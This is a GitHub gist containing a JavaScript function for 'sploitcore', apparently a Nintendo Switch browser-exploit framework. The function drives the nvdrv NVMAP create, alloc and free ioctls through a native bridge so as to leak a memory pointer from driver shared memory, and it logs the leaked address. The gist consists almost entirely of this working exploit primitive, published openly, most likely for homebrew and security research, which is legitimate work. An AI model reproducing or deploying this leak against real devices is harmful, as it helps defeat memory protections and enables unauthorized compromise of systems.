Skip to content

Instantly share code, notes, and snippets.

@hexkyz

hexkyz/sploitcore_nvdrv_leak.js

Created December 28, 2018 19:09
Show Gist options
  • Save hexkyz/7b126bf78f9315c9963f3bd3af429027 to your computer and use it in GitHub Desktop.
Save hexkyz/7b126bf78f9315c9963f3bd3af429027 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sploitcore_nvdrv_leak.js
sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
var temp_buf = this.malloc(0x1000);
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
// Setup buffers
var in_buf_ioctl = utils.add2(temp_buf, 0x000);
var out_buf_ioctl = utils.add2(temp_buf, 0x100);
var out_buf_status = utils.add2(temp_buf, 0x200);
var in_buf = utils.add2(temp_buf, 0x800);
var out_buf = utils.add2(temp_buf, 0x900);
var ioctl_num = 0;
// Prepare in/out buffers
this.write8(in_buf, in_buf_ioctl, 0x00/4); // Write the input buffer's address
this.write4(0x00000100, in_buf_ioctl, 0x08/4); // Write the input buffer's size
this.write8(out_buf, out_buf_ioctl, 0x00/4); // Write the output buffer's address
this.write4(0x00000100, out_buf_ioctl, 0x08/4); // Write the output buffer's size
// Setup the creation params
this.write4(0x00010000, in_buf, 0x00/4);
// Call NVMAP_IOC_CREATE
ioctl_num = 0xC0080101;
var ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
var ioctl_status = this.read4(out_buf_status);
// Read back handle
var nvmap_handle = this.read4(out_buf, 0x04/4);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_CREATE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_handle == 0x" + nvmap_handle.toString(16));
// Setup the allocation params
this.write4(nvmap_handle, in_buf, 0x00/4); // handle
this.write4(0x00000000, in_buf, 0x04/4); // heap mask
this.write4(0x00000001, in_buf, 0x08/4); // flags
this.write4(0x00001000, in_buf, 0x0C/4); // align
this.write4(0x00000000, in_buf, 0x10/4); // kind
this.write4(0x00000000, in_buf, 0x14/4); // padding
this.write4(0x00000000, in_buf, 0x18/4); // mem_addr_lo
this.write4(0x00000000, in_buf, 0x1C/4); // mem_addr_hi
// Call NVMAP_IOC_ALLOC
ioctl_num = 0xC0200104;
ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
ioctl_status = this.read4(out_buf_status);
// Read back result
var nvmap_alloc_res = this.read4(out_buf);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_ALLOC): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_alloc_res == 0x" + nvmap_alloc_res.toString(16));
// Setup the free params
this.write4(nvmap_handle, in_buf, 0x00/4); // handle
this.write4(0x00000000, in_buf, 0x04/4); // flags
this.write4(0x00000000, in_buf, 0x08/4); // mem_addr_lo
this.write4(0x00000000, in_buf, 0x0C/4); // mem_addr_hi
this.write4(0x00000000, in_buf, 0x10/4); // mem_size
this.write4(0x00000000, in_buf, 0x14/4); // mem_is_cached
// Call NVMAP_IOC_FREE
ioctl_num = 0xC0180105;
ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
ioctl_status = this.read4(out_buf_status);
// Read back result
var nvmap_free_res = this.read4(out_buf);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_FREE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_free_res == 0x" + nvmap_free_res.toString(16));
// Read back the leaked pointer
var leak_ptr = this.read8(out_buf, 0x08/4);
utils.log('Leaked ptr: ' + utils.paddr(leak_ptr));
this.free(temp_buf);
return leak_ptr;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment